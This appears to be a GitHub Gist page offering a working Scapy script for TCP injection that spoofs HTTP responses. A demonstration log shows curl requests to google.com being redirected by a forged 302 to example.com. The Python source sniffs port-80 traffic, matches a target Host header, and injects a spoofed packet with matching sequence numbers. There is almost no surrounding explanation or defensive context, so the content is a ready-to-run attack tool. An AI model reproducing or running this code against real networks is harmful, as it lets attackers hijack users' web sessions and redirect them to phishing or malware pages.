-
-
Save saadmahboob/2b32c21c0e0f375d60d43466eb0fda0d to your computer and use it in GitHub Desktop.
TCP injection attack (HTTP redirection) using Scapy
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ sudo python tcp_http_spoof.py >&/dev/null & | |
| [1] 3477 | |
| $ curl -vL http://www.google.com/ | |
| * Hostname was NOT found in DNS cache | |
| * Trying 172.217.26.100... | |
| * Connected to www.google.com (172.217.26.100) port 80 (#0) | |
| > GET / HTTP/1.1 | |
| > User-Agent: curl/7.35.0 | |
| > Host: www.google.com | |
| > Accept: */* | |
| > | |
| < HTTP/1.1 302 Found | |
| < Location: http://www.example.com/ | |
| < Content-Length: 0 | |
| < Connection: close | |
| < | |
| * Closing connection 0 | |
| * Issue another request to this URL: 'http://www.example.com/' | |
| * Hostname was NOT found in DNS cache | |
| * Trying 93.184.216.34... | |
| * Connected to www.example.com (93.184.216.34) port 80 (#1) | |
| > GET / HTTP/1.1 | |
| > User-Agent: curl/7.35.0 | |
| > Host: www.example.com | |
| > Accept: */* | |
| > | |
| < HTTP/1.1 200 OK | |
| < Accept-Ranges: bytes | |
| < Cache-Control: max-age=604800 | |
| < Content-Type: text/html | |
| < Date: Mon, 08 Aug 2016 16:28:39 GMT | |
| < Etag: "359670651+gzip" | |
| < Expires: Mon, 15 Aug 2016 16:28:39 GMT | |
| < Last-Modified: Fri, 09 Aug 2013 23:54:35 GMT | |
| * Server ECS (cpm/F9D5) is not blacklisted | |
| < Server: ECS (cpm/F9D5) | |
| < Vary: Accept-Encoding | |
| < X-Cache: HIT | |
| < x-ec-custom-error: 1 | |
| < Content-Length: 1270 | |
| < | |
| <!doctype html> | |
| (snip) | |
| * Connection #1 to host www.example.com left intact |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from scapy.all import * | |
| class TCP_HTTP_am(AnsweringMachine): | |
| function_name="TCP_HTTP_spoof" | |
| filter = "tcp port 80" | |
| def parse_options(self, target_host="www.google.com", redirect_url='http://www.example.com/'): | |
| self.target_host = target_host | |
| self.redirect_url = redirect_url | |
| def is_request(self, req): | |
| return req.haslayer(Raw) and ("Host: %s" % self.target_host in req.getlayer(Raw).load) | |
| def make_reply(self, req): | |
| ip = req.getlayer(IP) | |
| tcp = req.getlayer(TCP) | |
| http_payload = "HTTP/1.1 302 Found\r\nLocation: %s\r\nContent-Length: 0\r\nConnection: close\r\n\r\n" % self.redirect_url | |
| resp = IP(dst=ip.src, src=ip.dst) / TCP(dport=ip.sport,sport=ip.dport, flags="PA", seq=tcp.ack, ack=tcp.seq+len(tcp.payload)) / Raw(load=http_payload) | |
| return resp | |
| if __name__ == '__main__': | |
| conf.L3socket = L3RawSocket | |
| TCP_HTTP_am()() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment